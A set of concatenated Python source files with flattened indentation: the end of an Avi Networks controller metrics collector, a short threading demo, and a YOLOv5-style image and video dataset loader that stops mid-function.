temp_payload['se_name'] = entry
temp_payload['se_group'] = se_vs[entry]['se_group']
temp_payload['tenant'] = se_vs[entry]['tenant']
temp_payload['cloud'] = se_vs[entry]['cloud']
temp_payload['metric_type'] = 'serviceengine_capacity'
temp_payload['metric_name'] = 'vs_capacity_used'
temp_payload['metric_value'] = vs_percentage_used
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||serviceengine||%s||vs_capacity_used' %entry
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func service_engine_vs_capacity completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func service_engine_vs_capacity encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
def license_expiration(self):
try:
if datetime.now().hour % 6 == 0: #----- run once every 6 hours
current_time = datetime.today()
temp_start_time = time.time()
licenses = self.avi_request('license','admin').json()
for l in licenses['licenses']:
license_id = l['license_id']
try:
expires = datetime.strptime(l['valid_until'],"%Y-%m-%d %H:%M:%S")
except:
expires = datetime.strptime(l['valid_until'],"%Y-%m-%dT%H:%M:%S")
days_to_expire = (expires - current_time).days
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['license_id'] = license_id
temp_payload['metric_type'] = 'license'
temp_payload['metric_name'] = 'license_expiration'
temp_payload['metric_value'] = days_to_expire
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||licensing||expiration_days||'+license_id
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_expiration completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func license_expiration encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET AVI SOFTWARE VERSION NUMBER AND ASSIGN VALUE OF 1
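    #----- The SE software version is carried in the payload's 'version' field and
    #----- metric_value is always 1, so the series simply marks which version each SE runs.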
def get_serviceengine_version(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
for s in self.se_dict:
current_version = self.se_dict[s]['results']['runtime']['version'].split(' ',1)[0]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'se_version'
temp_payload['metric_name'] = 'current_version'
temp_payload['version'] = current_version
temp_payload['se_name'] = self.se_dict[s]['name']
temp_payload['se_group'] = self.se_dict[s]['se_group']
temp_payload['tenant'] = self.se_dict[s]['tenant']
temp_payload['cloud'] = self.se_dict[s]['cloud']
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||current_version||%s' %current_version
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func get_serviceengine_version completed, executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': get_serviceengine_version encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET AVI SOFTWARE VERSION NUMBER AND ASSIGN VALUE OF 1
def get_controller_version(self):
try:
temp_start_time = time.time()
endpoint_payload_list = []
#current_version = self.login.json()['version']['Version']+'('+str(self.login.json()['version']['build'])+')'
cluster_status = self.avi_request('cluster/runtime','admin').json()
current_version = cluster_status['node_info']['version'].split(' ',1)[0]
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'controller_version'
temp_payload['metric_name'] = 'current_version'
temp_payload['version'] = current_version
temp_payload['metric_value'] = 1
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||current_version||%s' %current_version
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func get_controller_version completed, executed in '+temp_total_time+' seconds')
except:
            print(str(datetime.now())+' '+self.avi_cluster_ip+': get_controller_version encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET Pool Member specific statistics
def pool_server_stats_threaded(self):
try:
temp_start_time = time.time()
proc = []
for t in self.tenants:
p = Process(target = self.pool_server_stats, args = (t['name'],))
p.start()
proc.append(p)
if len(proc) > 9:
for _p in proc:
_p.join()
proc = []
for p in proc:
p.join()
temp_total_time = str(time.time()-temp_start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats_threaded completed, executed in '+temp_total_time+' seconds')
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET Pool Member specific statistics
def pool_server_stats(self,tenant):
try:
temp_start_time = time.time()
endpoint_payload_list = []
discovered_servers = []
payload = {
"metric_requests": [
{
"step": 300,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"obj_id": "*",
"pool_uuid": "*",
"id": "collItemRequest:AllServers",
"metric_id": self.pool_server_metric_list
}
]}
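            #----- obj_id '*' and pool_uuid '*' expand the collection to every server in every
            #----- pool for this tenant; step 300 with limit 1 returns the latest 5-minute
            #----- sample per server and metric.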
api_url = 'analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true'
resp = self.avi_post(api_url,tenant,payload).json()
if self.pool_realtime == True:
payload = {
"metric_requests": [
{
"step": 5,
"limit": 1,
"aggregate_entity": False,
"entity_uuid": "*",
"obj_id": "*",
"pool_uuid": "*",
"id": "collItemRequest:AllServers",
"metric_id": self.pool_server_metric_list
}
]}
realtime_stats = self.avi_post('analytics/metrics/collection?pad_missing_data=false&dimension_limit=1000&include_name=true&include_refs=true', tenant, payload).json()
if 'series' in resp:
if len(resp['series']['collItemRequest:AllServers']) != 0:
for p in resp['series']['collItemRequest:AllServers']:
if p not in discovered_servers:
discovered_servers.append(p)
server_object = p.split(',')[2]
for d in resp['series']['collItemRequest:AllServers'][p]:
if 'data' in d:
pool_name = d['header']['pool_ref'].rsplit('#',1)[1]
metric_name = d['header']['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['pool_name'] = pool_name
temp_payload['tenant'] = self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('/api/pool/')[1]]['tenant']
temp_payload['cloud'] = self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('api/pool/')[1]]['cloud']
temp_payload['pool_member'] = server_object
temp_payload['metric_type'] = 'pool_member_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = d['data'][0]['value']
if 'entity_ref' in d['header']:
vs_name = d['header']['entity_ref'].rsplit('#',1)[1]
temp_payload['vs_name'] = vs_name
temp_payload['name_space'] = 'avi||%s||virtualservice||%s||pool||%s||%s||%s' %(self.avi_cluster_name,vs_name, pool_name, server_object,metric_name)
#endpoint_payload_list.append(temp_payload)
else:
for v in self.pool_dict[d['header']['pool_ref'].rsplit('#',1)[0].split('api/pool/')[1]]['results']['virtualservices']:
vs_name = v.rsplit('#',1)[1]
#temp_payload1 = temp_payload.copy()
temp_payload['vs_name'] = vs_name
temp_payload['name_space'] = 'avi||%s||virtualservice||%s||pool||%s||%s||%s' %(self.avi_cluster_name,vs_name, pool_name, server_object,metric_name)
if self.pool_realtime == True:
if 'series' in realtime_stats:
if p in realtime_stats['series']['collItemRequest:AllServers']:
for n in realtime_stats['series']['collItemRequest:AllServers'][p]:
if n['header']['name'] == d['header']['name']:
if 'data' in n:
temp_payload['metric_value'] = n['data'][0]['value']
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
temp_total_time = str(time.time()-temp_start_time)
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats completed for tenant '+tenant+', executed in '+temp_total_time+' seconds')
except:
print(str(datetime.now())+' '+self.avi_cluster_ip+': func pool_server_stats encountered an error for tenant '+tenant)
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#----- GET customer Member specific statistics
def controller_cluster_metrics(self):
try:
temp_start_time = time.time()
major,minor = self.login.json()['version']['Version'].rsplit('.',1)
if (float(major) >= 17.2 and float(minor) >= 5) or float(major) >= 18.1: #----- controller metrics api introduced in 17.2.5
cluster= self.avi_request('cluster','admin').json()
cluster_nodes = {}
temp_list=[]
endpoint_payload_list = []
for c in cluster['nodes']:
cluster_nodes[c['vm_uuid']]=c['ip']['addr']
#cluster_nodes[c['vm_uuid']]=c['vm_hostname']
                    resp = self.avi_request('analytics/metrics/controller/%s/?metric_id=%s&limit=1&step=300&aggregate_entity=False' %(c['vm_uuid'],self.controller_metric_list),'admin').json()
temp_list.append(resp)
for n in temp_list:
node = cluster_nodes[n['entity_uuid']]
for m in n['series']:
metric_name = m['header']['name']
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['cluster_node'] = node
temp_payload['metric_type'] = 'controller_metrics'
temp_payload['metric_name'] = metric_name
temp_payload['metric_value'] = m['data'][0]['value']
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||controller||%s||%s' %(node,metric_name)
endpoint_payload_list.append(temp_payload)
if len(endpoint_payload_list) > 0:
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
else:
pass
temp_total_time = str(time.time()-temp_start_time)
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func controller_cluster_metrics completed, executed in '+temp_total_time+' seconds')
except:
            print(str(datetime.now())+' '+self.avi_cluster_ip+': func controller_cluster_metrics encountered an error')
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#-----------------------------------
#-----------------------------------
#-----------------------------------
#-----------------------------------
#----- This is the method within the class that will execute the other methods.
#----- all test methods will need to be added to test_functions list to be executed
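    #----- Flow: log in, read the tenant list from the login response, assemble the list of
    #----- metric functions from the *_metrics / *_runtime flags, build the inventory dicts,
    #----- prune the metric lists for this controller version, run every function in its own
    #----- process, then report the script's own execution time as a metric.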
def gather_metrics(self):
try:
start_time = time.time()
self.login = self.avi_login()
if self.login.status_code == 200:
self.tenants = self.login.json()['tenants']
#self.avi_controller = self.controller_to_poll()
#-----------------------------------
#----- Add Test functions to list for threaded execution
#-----------------------------------
test_functions = []
if self.vs_metrics == True:
test_functions.append(self.virtual_service_stats_threaded)
test_functions.append(self.vs_metrics_per_se_threaded)
if self.vs_runtime == True:
test_functions.append(self.vs_oper_status)
test_functions.append(self.vs_primary_se)
test_functions.append(self.virtual_service_hosted_se)
#------
if self.se_metrics == True:
test_functions.append(self.srvc_engn_stats_threaded)
if self.se_runtime == True:
test_functions.append(self.srvc_engn_vs_count)
test_functions.append(self.srvc_engn_count)
test_functions.append(self.se_missed_hb)
test_functions.append(self.service_engine_vs_capacity)
test_functions.append(self.se_connected)
test_functions.append(self.get_serviceengine_version)
#------
if self.pool_metrics == True:
test_functions.append(self.pool_server_stats_threaded)
if self.pool_runtime == True:
test_functions.append(self.active_pool_members)
#------
if self.controller_metrics == True:
test_functions.append(self.controller_cluster_metrics)
if self.controller_runtime == True:
test_functions.append(self.cluster_status)
test_functions.append(self.avi_subnet_usage)
test_functions.append(self.license_usage)
test_functions.append(self.license_expiration)
test_functions.append(self.get_controller_version)
#-----------------------------------
_flist = []
for _t in test_functions:
_flist.append(str(_t).split('bound method ')[1].split(' ',1)[0])
print('=====> Running the following metrics functions: ')
for _f in _flist:
print(' ',_f)
print('-------------------------------------------------------------------')
#-----------------------------------
self.avi_controller = self.avi_cluster_ip
print('=====> Chose '+self.avi_controller)
self.vs_dict, self.se_dict, self.pool_dict, self.seg_dict = self.gen_inventory_dict()
#---- remove metrics that are not available in the current version
self.vs_metric_list, self.se_metric_list, self.controller_metric_list, self.pool_server_metric_list = self.remove_version_specific_metrics()
#-----------------------------------
#-----------------------------------
#-----
#-----------------------------------
#----- BEGIN Running Test Functions
#-----------------------------------
proc = []
for f in test_functions:
p = Process(target = f, args = ())
p.start()
proc.append(p)
for p in proc:
p.join()
#-----------------------------------
#-----
#-----------------------------------
#----- Log time it took to execute script
#-----------------------------------
total_time = str(time.time()-start_time)
print(str(datetime.now())+' '+self.avi_cluster_ip+': controller specific tests have completed, executed in '+total_time+' seconds')
endpoint_payload_list = []
temp_payload = self.payload_template.copy()
temp_payload['timestamp']=int(time.time())
temp_payload['metric_type'] = 'metricscript'
temp_payload['metric_name'] = 'execution_time'
temp_payload['metric_value'] = float(total_time)*1000
temp_payload['name_space'] = 'avi||'+self.avi_cluster_name+'||metricscript||executiontime'
endpoint_payload_list.append(temp_payload)
send_metriclist_to_endpoint(self.endpoint_list, endpoint_payload_list)
elif self.login.status_code == 'timedout':
print(self.avi_cluster_ip+': AVI ERROR: timeout trying to access '+self.avi_cluster_ip)
            elif self.login.status_code == 401:
print(self.avi_cluster_ip+': AVI ERROR: unable to login to '+self.avi_cluster_ip+' : '+self.login.text)
else:
print(self.avi_cluster_ip+': AVI ERROR: unknown login error to '+self.avi_cluster_ip)
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' Unable to login to: '+self.avi_cluster_ip)
print(str(datetime.now())+' '+self.avi_cluster_ip+': '+exception_text)
#--- THIS METHOD KICKS OFF THE EXECUTION
def run(self):
self.gather_metrics()
#-----------------------------------
#-----------------------------------
#-----------------------------------
#--- Primary function to execute the metrics gathering
#--- This function will create a avi_metrics object for each controller
#--- and kick off the metrics gathering for them.
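#--- Example of the expected configuration.yaml shape (hypothetical values):
#---   controllers:
#---     - avi_controller: 10.10.10.10
#---       avi_cluster_name: cluster-01
#---       avi_user: admin
#---       avi_pass: <password, optionally base64 encoded - handled by isBase64()>
#---   metrics_endpoint_config: <optional endpoint settings>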
def main():
start_time = time.time()
proc = []
for entry in avi_controller_list:
avi_controller = entry['avi_controller']
avi_cluster_name = entry['avi_cluster_name']
c = avi_metrics(avi_controller, avi_cluster_name, entry['avi_user'], isBase64(entry['avi_pass']), entry)
p = Process(target = c.run, args = ())
p.start()
proc.append(p)
for p in proc:
p.join()
total_time = str(time.time()-start_time)
print(str(datetime.now())+' AVI_SCRIPT: metric script has completed, executed in '+total_time+' seconds')
#----- START SCRIPT EXECUTION
#----- check for docker environment Variable
#----- if docker environment, runs as while loop
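#----- In Docker mode the YAML configuration is read from the EN_CONFIGURATION environment
#----- variable (a backup copy is written to configuration.bak) and main() is re-run roughly
#----- once a minute, sleeping to the top of the next minute between runs.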
if 'EN_DOCKER' in os.environ:
fdir = os.path.abspath(os.path.dirname(__file__))
configuration = False
global_endpoint_config = None
if 'EN_CONFIGURATION' in os.environ:
try:
import yaml
configuration = yaml.safe_load(os.environ['EN_CONFIGURATION'].replace('\t',' '))
with open('configuration.bak', 'w') as yaml_file:
yaml.dump(configuration, yaml_file, default_flow_style=False)
except:
print(str(datetime.now())+' Error with Provided Configuration YAML')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
sys.exit(1)
while True:
loop_start_time = time.time()
avi_controller_list = configuration['controllers']
if 'metrics_endpoint_config' in configuration:
global_endpoint_config = configuration['metrics_endpoint_config']
main()
loop_total_time = time.time()-loop_start_time
if loop_total_time < 60:
print(str(datetime.now())+' AVI_SCRIPT: sleeping for '+str(60 - datetime.now().second)+' seconds')
time.sleep(60 - datetime.now().second)
else:
print(str(datetime.now())+' No Configuration provided')
else:
#----- Get the file path to import configuration, needed for cron
try:
fdir = os.path.abspath(os.path.dirname(__file__))
configuration = False
global_endpoint_config = None
import yaml
print(fdir)
if os.path.isfile(fdir+'/configuration.yaml') == True:
with open(fdir+'/configuration.yaml', 'r') as yaml_file:
configuration = yaml.safe_load(yaml_file)
#----- Import avi controller info from json file
if 'metrics_endpoint_config' in configuration:
global_endpoint_config = configuration['metrics_endpoint_config']
avi_controller_list = configuration['controllers']
main()
else:
print(str(datetime.now())+' No Configuration provided')
except:
print(str(datetime.now())+' Error with Provided Configuration YAML')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
sys.exit(1)
|
start_threads.py
|
import threading
import time
def do_it() -> None:
time.sleep(0.0000001)
print("did it")
thread1 = threading.Thread(target=do_it)
print("getting ready to call start")
thread1.start()
print("some thread independent operation")
thread1.join()
print("done")
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import json
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from tools.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
import yaml
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
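# Builds a LoadImagesAndLabels dataset and wraps it in an InfiniteDataLoader; in distributed
# (DDP) runs a DistributedSampler is attached, and the worker count is capped by CPU count
# per process, batch size and the workers argument.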
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=0):
    # Make sure only the first process in DDP processes the dataset first, so the other processes can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
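# Hedged note on the two classes above: because _RepeatSampler never raises
# StopIteration, the single iterator built in InfiniteDataLoader.__init__
# (and its worker processes) survives across epochs; __iter__ simply draws
# len(self) batches from it each time. Arguments below are illustrative.
#
# train_loader = InfiniteDataLoader(dataset, batch_size=16, num_workers=4)
# for epoch in range(3):
#     for batch in train_loader:  # the same workers are reused every epoch
#         pass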
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
self.label_files = [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
                assert l.shape[1] == 5, 'labels require 5 columns each: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
